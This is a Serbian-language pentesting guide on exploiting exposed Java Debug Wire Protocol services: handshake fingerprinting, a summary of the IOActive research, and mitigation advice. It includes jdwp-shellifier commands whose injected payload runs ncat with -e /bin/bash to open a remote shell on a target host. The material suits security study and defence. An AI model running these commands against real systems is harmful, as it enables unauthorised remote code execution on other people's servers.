Trickest

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.

Get access

Pentesting JDWP - Java Debug Wire Protocol

Reading time: 4 minutes

Eksploatacija

JDWP eksploatacija se oslanja na nedostatak autentifikacije i enkripcije protokola. Obično se nalazi na portu 8000, ali su mogući i drugi portovi. Početna veza se uspostavlja slanjem "JDWP-Handshake" na ciljni port. Ako je JDWP servis aktivan, odgovara istim stringom, potvrđujući svoju prisutnost. Ova rukovanja deluju kao metoda otiska prsta za identifikaciju JDWP servisa na mreži.

U smislu identifikacije procesa, pretraga za stringom "jdwk" u Java procesima može ukazivati na aktivnu JDWP sesiju.

Osnovni alat je jdwp-shellifier. Možete ga koristiti sa različitim parametrima:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

Pronašao sam da korišćenje --break-on 'java.lang.String.indexOf' čini eksploataciju stabilnijom. A ako imate priliku da otpremite backdoor na host i izvršite ga umesto izvršavanja komande, eksploatacija će biti još stabilnija.

Više detalja

Ovo je sažetak https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Proverite ga za dodatne detalje.

1. JDWP Pregled:

• To je protokol zasnovan na paketima, prvenstveno sinhron.
• Nedostaje autentifikacija i enkripcija, što ga čini ranjivim kada je izložen neprijateljskim mrežama.

2. JDWP Rukovanje:

• Koristi se jednostavan proces rukovanja za iniciranje komunikacije. Razmenjuje se ASCII string od 14 karaktera “JDWP-Handshake” između Debuggera (klijent) i Debuggee-a (server).

3. JDWP Komunikacija:

• Poruke imaju jednostavnu strukturu sa poljima kao što su Dužina, Id, Zastava i CommandSet.
• Vrednosti CommandSet-a kreću se od 0x40 do 0x80, predstavljajući različite akcije i događaje.

4. Eksploatacija:

• JDWP omogućava učitavanje i pozivanje proizvoljnih klasa i bajtkoda, što predstavlja sigurnosne rizike.
• Članak detaljno opisuje proces eksploatacije u pet koraka, uključujući preuzimanje referenci Java Runtime-a, postavljanje tačaka prekida i pozivanje metoda.

5. Eksploatacija u stvarnom životu:

• I pored potencijalnih zaštita od vatrozida, JDWP usluge su otkrivene i mogu se eksploatisati u stvarnim scenarijima, što je demonstrirano pretragama na platformama kao što su ShodanHQ i GitHub.
• Skripta za eksploataciju testirana je protiv različitih verzija JDK-a i nezavisna je od platforme, nudeći pouzdano daljinsko izvršavanje koda (RCE).

6. Sigurnosne implikacije:

• Prisutnost otvorenih JDWP usluga na internetu naglašava potrebu za redovnim sigurnosnim pregledima, onemogućavanjem debug funkcionalnosti u produkciji i pravilnim konfiguracijama vatrozida.

Reference:

• [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]
• https://github.com/IOActive/jdwp-shellifier
• http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
• http://www.secdev.org/projects/scapy(no longer active)
• http://www.shodanhq.com/search?q=JDWP-HANDSHAKE
• http://www.hsc-news.com/archives/2013/000109.html (no longer active)
• http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt
• https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
• http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
• http://nmap.org/nsedoc/scripts/jdwp-exec.html